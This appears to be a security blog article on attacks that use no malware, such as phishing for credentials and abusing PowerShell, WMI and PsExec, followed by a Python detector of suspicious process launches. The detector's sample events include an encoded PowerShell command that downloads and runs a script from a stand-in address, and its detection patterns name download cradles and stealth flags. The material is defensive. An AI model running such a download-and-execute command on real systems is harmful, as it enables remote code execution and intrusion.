60% of attacks involve no malware, which means antivirus, sandboxing, IOC feeds and other signature-based controls stand little chance of detecting them. This is the new reality that companies that have invested in anti-malware will have to adapt to.
Why have attackers moved away from using malware?
Using malware increases the chance of being detected, so sophisticated adversaries have perfected their attack methodology to avoid dropping binaries that may be flagged.
Many attacks begin with spear-phishing to harvest credentials, which are then used to access the corporate network through legitimate channels such as the VPN, webmail or SharePoint. Because nothing malicious crosses the perimeter, defences such as sandboxing have nothing to detonate and are rendered ineffective.
Once a foothold is established, the attackers ‘live off the land’, using built-in OS functionality such as PowerShell, WMI and Remote Desktop, as well as legitimate administration tools like PsExec and TeamViewer, to access and control victim hosts.
Even where they do use malicious code, it’s executed directly in memory so as to leave no footprint on the file system for antivirus or file integrity monitoring to detect; what remains is the process that loaded it and the command line or script that launched it.
By ensuring the attack looks just like normal activity and by using normal tools, they easily evade traditional protection and monitoring solutions.
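The evasion described above defeats hash- and signature-based tooling, but the command line each built-in tool receives and the parent that launched it are still recorded (Sysmon Event ID 1, Windows 4688 with command-line auditing, PowerShell script block logging). The following Python is an added example, not code from the original article: it runs a handful of behavioural rules over constructed sample process-creation events (made up for this example, in a simplified key=value form) covering the techniques the article names: hidden, encoded PowerShell launched from Word, a PsExec service binary, and a shell spawned by the WMI provider host. The field names, rule names and sample hosts are assumptions for illustration.

```python
# Behavioural detection over process-creation events (added example).
# No file to hash exists for these attacks; the rules key on what each
# built-in tool was told to do and on which process launched it.
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample events in a simplified Sysmon Event ID 1 / Windows 4688
# style. They are made up for this example and are not real telemetry. The
# encoded command is built here with the UTF-16LE + base64 encoding that
# PowerShell's -EncodedCommand expects.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s.ps1')"
    .encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    'host=WS01 user=CORP\\jdoe parent=explorer.exe image=C:\\Windows\\System32\\notepad.exe cmdline="notepad.exe C:\\Users\\jdoe\\notes.txt"',
    'host=WS01 user=CORP\\jdoe parent=cmd.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -File C:\\Scripts\\backup.ps1"',
    'host=WS01 user=CORP\\jdoe parent=WINWORD.EXE image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -nop -w hidden -enc ' + ENCODED_PAYLOAD + '"',
    'host=SRV02 user="NT AUTHORITY\\SYSTEM" parent=services.exe image=C:\\Windows\\PSEXESVC.exe cmdline="C:\\Windows\\PSEXESVC.exe"',
    'host=SRV02 user=CORP\\svc_admin parent=WmiPrvSE.exe image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt"',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
PSEXEC = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
# -e / -enc / -encodedcommand followed by a base64 blob.
ENC_RE = re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Flags that hide the window or skip profile/policy: innocuous alone, telling together.
STEALTH_RE = [re.compile(p, re.I) for p in (
    r"-nop(?:rofile)?\b", r"-w(?:indowstyle)?\s+hidden\b",
    r"-noni(?:nteractive)?\b", r"-e(?:xec(?:utionpolicy)?|p)\s+bypass\b")]
# Download-and-run cradle keywords, checked on the command line and any decoded payload.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression|FromBase64String", re.I)


@dataclass
class Finding:
    event_index: int
    host: str
    rule: str
    detail: str


def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value line into a dict, stripping quotes from quoted values."""
    return {k: (v[1:-1] if v.startswith('"') else v) for k, v in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(index: int, event: Dict[str, str]) -> List[Finding]:
    """Apply every rule to one parsed event and return the findings it produces."""
    host = event.get("host", "?")
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent", ""))
    cmdline = event.get("cmdline", "")
    text_to_scan = cmdline
    out = []
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            out.append(Finding(index, host, "encoded_powershell", decoded))
            text_to_scan += " " + decoded  # scan the decoded script as well
        stealth = [p.pattern for p in STEALTH_RE if p.search(cmdline)]
        if len(stealth) >= 2:
            out.append(Finding(index, host, "stealth_powershell_flags", ", ".join(stealth)))
    cradle = CRADLE_RE.search(text_to_scan)
    if cradle:
        out.append(Finding(index, host, "download_cradle", cradle.group(0)))
    if parent in OFFICE and image in SHELLS:
        out.append(Finding(index, host, "office_spawned_shell", f"{parent} -> {image}"))
    if parent == "wmiprvse.exe" and image in SHELLS:  # remote WMI process creation lands here
        out.append(Finding(index, host, "wmi_spawned_shell", f"{parent} -> {image}"))
    if image in PSEXEC:
        out.append(Finding(index, host, "psexec_service", image))
    return out


def analyze(lines: List[str]) -> List[Finding]:
    findings = []
    for i, line in enumerate(lines):
        findings.extend(evaluate(i, parse_event(line)))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f.event_index} {f.host}: {f.rule} ({f.detail[:60]})")
```

Running the file prints one line per finding. The two benign events (Notepad, and an administrator running `-File backup.ps1`) produce nothing, which is the point: the rules key on arguments and process lineage, not on the mere presence of PowerShell or cmd.exe, so they keep working when no binary is ever dropped.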
Malware-less attacks are only going to increase, especially through the use of PowerShell scripts — entire frameworks for post-exploitation and privilege escalation now exist. The fact that penetration testing teams have started relying heavily on these tools is just another indicator of their effectiveness.